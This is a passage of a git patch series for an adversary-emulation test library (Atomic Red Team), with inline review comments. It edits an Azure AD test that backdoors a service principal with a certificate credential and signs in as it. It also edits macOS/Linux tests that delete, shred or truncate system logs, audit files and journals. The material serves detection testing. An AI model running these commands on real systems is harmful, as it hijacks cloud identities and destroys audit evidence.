From f5ce8af9a41dc8fa4a38332d15a0be198f6ba62b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Cl=C3=A9ment=20Notin?=
Date: Fri, 2 Jun 2023 17:28:23 +0200
Subject: [PATCH 01/10] No need to export the PFX to get the public certificate, so removed it
---
 atomics/T1098.001/T1098.001.yaml | 40 +++++++-------------------------
 1 file changed, 8 insertions(+), 32 deletions(-)
diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml
index b203d66d..ff5c5d8d 100644
--- a/atomics/T1098.001/T1098.001.yaml
+++ b/atomics/T1098.001/T1098.001.yaml
@@ -22,14 +22,6 @@ atomic_tests:
 description: Name of the targeted service principal
 type: string
 default: SuperSP
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: $env:TEMP
 dependency_executor_name: powershell
 dependencies:
 - description: |
@@ -49,21 +41,18 @@ atomic_tests: if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId 
-ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" @@ -82,7 +71,6 @@ atomic_tests: } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item - rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore name: powershell elevation_required: false @@ -107,14 +95,6 @@ atomic_tests: description: Name of the targeted application type: string default: SuperApp - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: $env:TEMP dependency_executor_name: powershell dependencies: - description: | 
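Review bot: The new `$cert = New-SelfSignedCertificate ...` line in hunk @@ -49 still passes `-KeyExportPolicy Exportable`, but the only consumer of an exportable key, the removed `Export-PfxCertificate` call, is gone; the test now needs only the public half via `GetRawCertData()` and the thumbprint for `Connect-AzureAD -CertificateThumbprint`. Creating the key with `-KeyExportPolicy NonExportable` narrows what is left behind in `Cert:\CurrentUser\My` when the cleanup command is never run, without changing what the test demonstrates. The same line appears in the application variant at hunk @@ -134. The PowerShell block these lines belong to starts before the hunk.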
@@ -134,21 +114,18 @@ atomic_tests: if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId 
$app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: | @@ -166,7 +143,6 @@ atomic_tests: } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item - rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore name: powershell elevation_required: false - name: AWS - Create Access Key and Secret Key From 96d388114968f47719e341927aa64389cdb1f3dc Mon Sep 17 00:00:00 2001 From: Alex M <58046369+amalone-scwx@users.noreply.github.com> Date: Sun, 4 Jun 2023 09:01:22 -0700 Subject: [PATCH 02/10] parameterize T1070.002 tests for optional non-destructive runs --- atomics/T1070.002/T1070.002.yaml | 195 ++++++++++++++++++++++++++++--- 1 file changed, 176 insertions(+), 19 deletions(-) diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml index 4301a4f3..6dbf67c2 100644 --- a/atomics/T1070.002/T1070.002.yaml +++ b/atomics/T1070.002/T1070.002.yaml 
@@ -8,10 +8,28 @@ atomic_tests:
 supported_platforms:
 - macos
 - linux
+ input_arguments:
+ syslog_path:
+ description: path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/.
+ type: String
+ default: /var/log/sys_T1070.002_1.log
+ macos_audit_path:
+ description: path of audit file to delete
+ type: String
+ default: /var/audit/20220725213300.202208110700021
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path}
+ get_prereq_command: |
+ touch #{syslog_path}
+ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
 executor:
 command: |
- sudo rm -rf /private/var/log/system.log*
- sudo rm -rf /private/var/audit/*
+ sudo rm -rf #{syslog_path}
+ if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
 name: sh
 elevation_required: true
 - name: Delete log files using built-in log utility
@@ -24,7 +42,6 @@ atomic_tests:
 command: |
 sudo log erase --all
 sudo log erase --ttl #Deletes only time-to-live log content
- sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
 name: sh
 elevation_required: true
 - name: Truncate system log files via truncate utility
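Review bot: The new `get_prereq_command` in hunk @@ -8 runs `touch #{syslog_path}` and `touch #{macos_audit_path}` without `sudo`, while the executor that removes the same files is marked `elevation_required: true`; with the defaults under /var/log and /var/audit the prerequisite can only succeed if the dependency executor is itself run elevated, which nothing in the YAML expresses. If the runner does not elevate prerequisite commands, `sudo touch #{syslog_path}` (and likewise for the audit path) makes the prerequisite reachable on a stock host. The same unelevated `touch`/`mkdir -p` appears in every other `get_prereq_command` this commit adds (hunks @@ -33 through @@ -152) and in patch 05's hunk @@ -325.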
@@ -33,10 +50,23 @@ atomic_tests:
 This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: String
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
 executor:
 command: |
- sudo truncate -s 0 /var/log/system.log #size parameter shorthand
- sudo truncate --size=0 /var/log/system.log #size parameter
+ sudo truncate -s 0 #{system_log_path} #size parameter shorthand
+ sudo truncate --size=0 #{system_log_path} #size parameter
 name: sh
 elevation_required: true
 - name: Delete log files via cat utility by appending /dev/null or /dev/zero
@@ -45,10 +75,23 @@ atomic_tests:
 The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: String
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
 executor:
 command: |
- sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
- sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+ sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
+ sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
 name: sh
 elevation_required: true
 - name: System log file deletion via find utility
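Review bot: In hunk @@ -45 the new `sudo cat /dev/null > #{system_log_path}` line still performs the `>` redirection in the calling shell, so unless the executor is already running as root the open of a root-owned log fails with permission denied before `sudo` is involved; the sibling line was rewritten to `sudo dd ... of=#{system_log_path}`, which opens the target as root, so only the first sub-test keeps the problem. Handing the redirection to the elevated shell, `sudo sh -c ': > "#{system_log_path}"'`, fixes it without changing what the sub-test demonstrates. The same redirection-by-caller pattern is on the new `sudo echo '' > #{system_log_path}` line in hunk @@ -70 and on the `sudo log -f ... | : > ...` line in hunk @@ -81 (kept in the revert in patch 08).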
@@ -57,11 +100,32 @@ atomic_tests:
 This test finds and deletes the system log files within /var/log/ directory using various executions(rm, shred, unlink)
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_name1:
+ description: name or prefix of system log to delete.
+ type: String
+ default: system.log
+ system_log_name2:
+ description: name or prefix of system log to delete.
+ type: String
+ default: system.log
+ system_log_name3:
+ description: name or prefix of system log to delete.
+ type: String
+ default: system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
+ get_prereq_command: |
+ touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
 executor:
 command: |
- sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
- sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
- sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
+ sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
+ sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
+ sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
 name: sh
 elevation_required: true
 - name: Overwrite macOS system log via echo utility
@@ -70,9 +134,14 @@ atomic_tests:
 This test overwrites the contents of system log file with an empty string using echo utility
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: String
+ default: /var/log/system.log
 executor:
 command: |
- sudo echo '' > /var/log/system.log
+ sudo echo '' > #{system_log_path}
 name: sh
 elevation_required: true
 - name: Real-time system log clearance/deletion
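Review bot: In hunk @@ -57 the prerequisite creates `/var/log/#{system_log_name1}` (and the two siblings), but the executor searches with `-name '#{system_log_name1}.*'`, a pattern that requires a dot plus at least one more character after the name; with the default `system.log` the file the prerequisite just touched is never matched, so the three sub-tests delete nothing and the placeholder files stay behind (there is no cleanup_command). Making the prerequisite create rotated-style names keeps the pattern's intent, e.g. `stat /var/log/#{system_log_name1}.1 /var/log/#{system_log_name2}.1 /var/log/#{system_log_name3}.1` and the matching `touch ... .1` line. Patch 06 (hunk @@ -108) changes the name2/name3 defaults to `system.log.97.gz` and `system.log.98.gz`, which have the same mismatch against the `.*` suffix.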
@@ -81,9 +150,14 @@ atomic_tests:
 This test reads real-time system log file and writes empty string to it, thus clearing the log file without tampering with the logging process
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: String
+ default: /var/log/system.log
 executor:
 command: |
- sudo log -f /var/log/system.log | : > /var/log/system.log
+ sudo log -f /var/log/system.log | : > #{system_log_path}
 name: sh
 elevation_required: true
 - name: Delete system log files via unlink utility
@@ -92,9 +166,22 @@ atomic_tests:
 This test deletes the system log file using unlink utility
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: String
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
 executor:
 command: |
- sudo unlink /var/log/system.log
+ sudo unlink #{system_log_path}
 name: sh
 elevation_required: true
 - name: Delete system log files using shred utility
@@ -103,9 +190,22 @@ atomic_tests:
 This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: String
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
 executor:
 command: |
- sudo shred -u -z -n 3 /var/log/system.log
+ sudo shred -u -z -n 3 #{system_log_path}
 name: sh
 elevation_required: true
 - name: Delete system log files using srm utility
@@ -116,10 +216,28 @@ atomic_tests:
 Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: String
+ default: /var/log/system.log
+ input_arguments:
+ system_log_folder:
+ description: path to log parent folder
+ type: String
+ default: /var/log/
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path} #{system_log_folder}
+ get_prereq_command: |
+ mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log
 executor:
 command: |
- sudo srm /var/log/system.log #system log file deletion
- sudo srm -r /var/log/ #recursive deletion of log files
+ sudo srm #{system_log_path} #system log file deletion
+ sudo srm -r #{system_log_folder} #recursive deletion of log files
 name: sh
 elevation_required: true
 - name: Delete system log files using OSAScript
@@ -128,9 +246,22 @@ atomic_tests:
 This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: String
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
 executor:
 command: |
- osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges'
+ osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges'
 name: sh
 elevation_required: true
 - name: Delete system log files using Applescript
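Review bot: In hunk @@ -116 the new `system_log_folder` argument defaults to `/var/log/`, so a default run of `sudo srm -r #{system_log_folder}` still irreversibly erases every file under the host's log directory, and the prerequisite's `mkdir -p ... && touch ...` does nothing to narrow that; since this commit's purpose is an optional non-destructive run, the default is exactly the value a user who has not read the argument list will get. A test-specific subdirectory as the default (created by the existing `mkdir -p` and holding the touched `system.log`) keeps the recursive sub-test meaningful while leaving the real log directory to a deliberately supplied path. Separately, the folder expansion is unquoted in both `stat` and `srm`; `"#{system_log_folder}"` avoids word-splitting on a path with spaces.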
@@ -141,9 +272,22 @@ atomic_tests:
 Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
 supported_platforms:
 - macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: String
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
 executor:
 command: |
- osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"'
+ osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"'
 name: sh
 elevation_required: true
 - name: Delete system journal logs via rm and journalctl utilities
@@ -152,9 +296,22 @@ atomic_tests:
 The first sub-test deletes the journal files using rm utility in the "/var/log/journal/" directory and the second sub-test clears the journal by modifiying time period of logs that should be retained to zero.
 supported_platforms:
 - linux
+ input_arguments:
+ journal_folder:
+ description: path to journal logs
+ type: String
+ default: /var/log/journal
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{journal_folder}
+ get_prereq_command: |
+ mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
 executor:
 command: |
- sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
+ sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
 sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
 name: sh
 elevation_required: true
From a0e412b7029a2277554123047a32b3840d4baf0b Mon Sep 17 00:00:00 2001
From: Alex M <58046369+amalone-scwx@users.noreply.github.com>
Date: Sun, 4 Jun 2023 09:10:55 -0700
Subject: [PATCH 03/10] fix syntax
---
 atomics/T1070.002/T1070.002.yaml | 1 -
 1 file changed, 1 deletion(-)
diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml
index 6dbf67c2..b6ebdccb 100644
--- a/atomics/T1070.002/T1070.002.yaml
+++ b/atomics/T1070.002/T1070.002.yaml
@@ -221,7 +221,6 @@ atomic_tests:
 description: path to system.log
 type: String
 default: /var/log/system.log
- input_arguments:
 system_log_folder:
 description: path to log parent folder
 type: String
From 2f0b0d79c18d6211b9e91db294b55b0fa091eff1 Mon Sep 17 00:00:00 2001
From: Alex M <58046369+amalone-scwx@users.noreply.github.com>
Date: Sun, 4 Jun 2023 12:56:50 -0700
Subject: [PATCH 04/10] fix default for system.log in 989cc1b1
---
 atomics/T1070.002/T1070.002.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml
index b6ebdccb..75c07353 100644
--- a/atomics/T1070.002/T1070.002.yaml
+++ b/atomics/T1070.002/T1070.002.yaml
@@ -12,7 +12,7 @@ atomic_tests:
 syslog_path:
 description: path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/.
 type: String
- default: /var/log/sys_T1070.002_1.log
+ default: /var/log/system.log
 macos_audit_path:
 description: path of audit file to delete
 type: String
From 211101b31992d8565f3e514d93c4e2e95d5097dc Mon Sep 17 00:00:00 2001
From: Alex M <58046369+amalone-scwx@users.noreply.github.com>
Date: Sun, 4 Jun 2023 13:16:43 -0700
Subject: [PATCH 05/10] fix elevation required on a couple
---
 atomics/T1070.002/T1070.002.yaml | 12 ++++++++++++
 1 file changed, 12 insertions(+)
diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml
index 75c07353..95d4744f 100644
--- a/atomics/T1070.002/T1070.002.yaml
+++ b/atomics/T1070.002/T1070.002.yaml
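Review bot: The new default `/var/log/system.log` in hunk @@ -12 of patch 04 is at odds with the argument's own description two lines above, which says the Linux syslog is `/var/log/syslog*`; on a Linux host the `stat #{syslog_path}` prerequisite fails, `get_prereq_command` then creates an empty `/var/log/system.log`, and `sudo rm -rf #{syslog_path}` removes only that placeholder, so a default Linux run never touches the real log while a default macOS run deletes the live one. If a single default has to serve both platforms, the description should say so, e.g. `description: path of syslog file to delete (the default is the macOS path; on linux pass /var/log/syslog or a test file). Also note for File events, that on macos, /var/ is a link to /private/var/.` The executor and prerequisite lines this affects are outside the hunk.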
@@ -325,7 +325,16 @@ atomic_tests:
 description: Username of mail spool
 type: string
 default: root
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat /var/spool/mail/#{username}
+ get_prereq_command: |
+ touch /var/spool/mail/#{username}
 executor:
+ elevation_required: true
 command: |
 echo 0> /var/spool/mail/#{username}
 name: bash
@@ -344,3 +353,6 @@ atomic_tests:
 command: |
 echo 0> #{log_path}
 name: bash
+ elevation_required: true
+ cleanup_command: |
+ if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} ; fi
From 40fe1f7cf7af74c6095b1d81706cca77e3772462 Mon Sep 17 00:00:00 2001
From: Alex M <58046369+amalone-scwx@users.noreply.github.com>
Date: Sun, 4 Jun 2023 13:25:12 -0700
Subject: [PATCH 06/10] change defaults to system_log_name2 and 3
---
 atomics/T1070.002/T1070.002.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml
index 95d4744f..2ef60683 100644
--- a/atomics/T1070.002/T1070.002.yaml
+++ b/atomics/T1070.002/T1070.002.yaml
@@ -108,11 +108,11 @@ atomic_tests:
 system_log_name2:
 description: name or prefix of system log to delete.
 type: String
- default: system.log
+ default: system.log.97.gz
 system_log_name3:
 description: name or prefix of system log to delete.
 type: String
- default: system.log
+ default: system.log.98.gz
 dependency_executor_name: sh
 dependencies:
 - description: |
From a7cc448291190537dd5e1f0976f714406b74ba5b Mon Sep 17 00:00:00 2001
From: Alex M <58046369+amalone-scwx@users.noreply.github.com>
Date: Mon, 5 Jun 2023 20:32:06 -0700
Subject: [PATCH 07/10] arg types lowercase string
---
 atomics/T1070.002/T1070.002.yaml | 32 ++++++++++++++++----------------
 1 file changed, 16 insertions(+), 16 deletions(-)
diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml
index 2ef60683..ace7be27 100644
--- a/atomics/T1070.002/T1070.002.yaml
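Review bot: The new `cleanup_command` in hunk @@ -344 quotes `#{log_path}` in the comparison but hands it unquoted to `rm -f #{log_path}`, so a path containing whitespace or glob characters is split or expanded before `rm` sees it; `rm -f -- "#{log_path}"` makes the two halves consistent. The guard also only protects the literal string `/var/log/secure`: an equivalent spelling (trailing slash, a symlink to it) passes the test and is removed, so a one-line comment such as `# literal match only: protects the default path, not aliases of it` would set expectations for whoever supplies a custom value. The `log_path` argument and its default are declared outside this hunk.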
+++ b/atomics/T1070.002/T1070.002.yaml
@@ -11,11 +11,11 @@ atomic_tests:
 input_arguments:
 syslog_path:
 description: path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/.
- type: String
+ type: string
 default: /var/log/system.log
 macos_audit_path:
 description: path of audit file to delete
- type: String
+ type: string
 default: /var/audit/20220725213300.202208110700021
 dependency_executor_name: sh
 dependencies:
@@ -53,7 +53,7 @@ atomic_tests:
 input_arguments:
 system_log_path:
 description: path of system log to delete.
- type: String
+ type: string
 default: /var/log/system.log
 dependency_executor_name: sh
 dependencies:
@@ -78,7 +78,7 @@ atomic_tests:
 input_arguments:
 system_log_path:
 description: path of system log to delete.
- type: String
+ type: string
 default: /var/log/system.log
 dependency_executor_name: sh
 dependencies:
@@ -103,15 +103,15 @@ atomic_tests:
 input_arguments:
 system_log_name1:
 description: name or prefix of system log to delete.
- type: String
+ type: string
 default: system.log
 system_log_name2:
 description: name or prefix of system log to delete.
- type: String
+ type: string
 default: system.log.97.gz
 system_log_name3:
 description: name or prefix of system log to delete.
- type: String
+ type: string
 default: system.log.98.gz
 dependency_executor_name: sh
 dependencies:
@@ -137,7 +137,7 @@ atomic_tests:
 input_arguments:
 system_log_path:
 description: path to system.log
- type: String
+ type: string
 default: /var/log/system.log
 executor:
 command: |
@@ -153,7 +153,7 @@ atomic_tests:
 input_arguments:
 system_log_path:
 description: path to system.log
- type: String
+ type: string
 default: /var/log/system.log
 executor:
 command: |
@@ -169,7 +169,7 @@ atomic_tests:
 input_arguments:
 system_log_path:
 description: path to system.log
- type: String
+ type: string
 default: /var/log/system.log
 dependency_executor_name: sh
 dependencies:
@@ -193,7 +193,7 @@ atomic_tests:
 input_arguments:
 system_log_path:
 description: path to system.log
- type: String
+ type: string
 default: /var/log/system.log
 dependency_executor_name: sh
 dependencies:
@@ -219,11 +219,11 @@ atomic_tests:
 input_arguments:
 system_log_path:
 description: path to system.log
- type: String
+ type: string
 default: /var/log/system.log
 system_log_folder:
 description: path to log parent folder
- type: String
+ type: string
 default: /var/log/
 dependency_executor_name: sh
 dependencies:
@@ -248,7 +248,7 @@ atomic_tests:
 input_arguments:
 system_log_path:
 description: path to system.log
- type: String
+ type: string
 default: /var/log/system.log
 dependency_executor_name: sh
 dependencies:
@@ -274,7 +274,7 @@ atomic_tests:
 input_arguments:
 system_log_path:
 description: path to system.log
- type: String
+ type: string
 default: /var/log/system.log
 dependency_executor_name: sh
 dependencies:
@@ -298,7 +298,7 @@ atomic_tests:
 input_arguments:
 journal_folder:
 description: path to journal logs
- type: String
+ type: string
 default: /var/log/journal
 dependency_executor_name: sh
 dependencies:
From 546ed5ea1e4be91e8de1e9f2645071fb1b0a3c30 Mon Sep 17 00:00:00 2001
From: Alex M <58046369+amalone-scwx@users.noreply.github.com>
Date: Fri, 9 Jun 2023 13:05:25 -0700
Subject: [PATCH 08/10] backout changes to log -f
---
 atomics/T1070.002/T1070.002.yaml | 7 +------
 1 file changed, 1 insertion(+), 6 deletions(-)
diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml
index ace7be27..c58d7d06 100644
--- a/atomics/T1070.002/T1070.002.yaml
+++ b/atomics/T1070.002/T1070.002.yaml
@@ -150,14 +150,9 @@ atomic_tests:
 This test reads real-time system log file and writes empty string to it, thus clearing the log file without tampering with the logging process
 supported_platforms:
 - macos
- input_arguments:
- system_log_path:
- description: path to system.log
- type: string
- default: /var/log/system.log
 executor:
 command: |
- sudo log -f /var/log/system.log | : > #{system_log_path}
+ sudo log -f /var/log/system.log | : > /var/log/system.log
 name: sh
 elevation_required: true
 - name: Delete system log files via unlink utility
From 49e9c5e04e0eb82a7dda938cda7b7f87730c7a6d Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator
Date: Fri, 9 Jun 2023 22:36:42 +0000
Subject: [PATCH 09/10] Generated docs from job=generate-docs branch=master [ci skip]
---
 atomics/Indexes/azure-ad-index.yaml | 44 +++++++----------------------
 atomics/Indexes/index.yaml | 44 +++++++----------------------
 atomics/T1098.001/T1098.001.md | 28 ++++++------------
 3 files changed, 28 insertions(+), 88 deletions(-)
diff --git a/atomics/Indexes/azure-ad-index.yaml b/atomics/Indexes/azure-ad-index.yaml
index 43a59236..e3f59826 100644
--- a/atomics/Indexes/azure-ad-index.yaml
+++ b/atomics/Indexes/azure-ad-index.yaml
@@ -37535,14 +37535,6 @@ persistence:
 description: Name of the targeted service principal
 type: string
 default: SuperSP
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: "$env:TEMP"
 dependency_executor_name: powershell
 dependencies:
 - description: 'AzureAD module must be installed.
@@ -37566,21 +37558,18 @@ persistence: if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $cert = 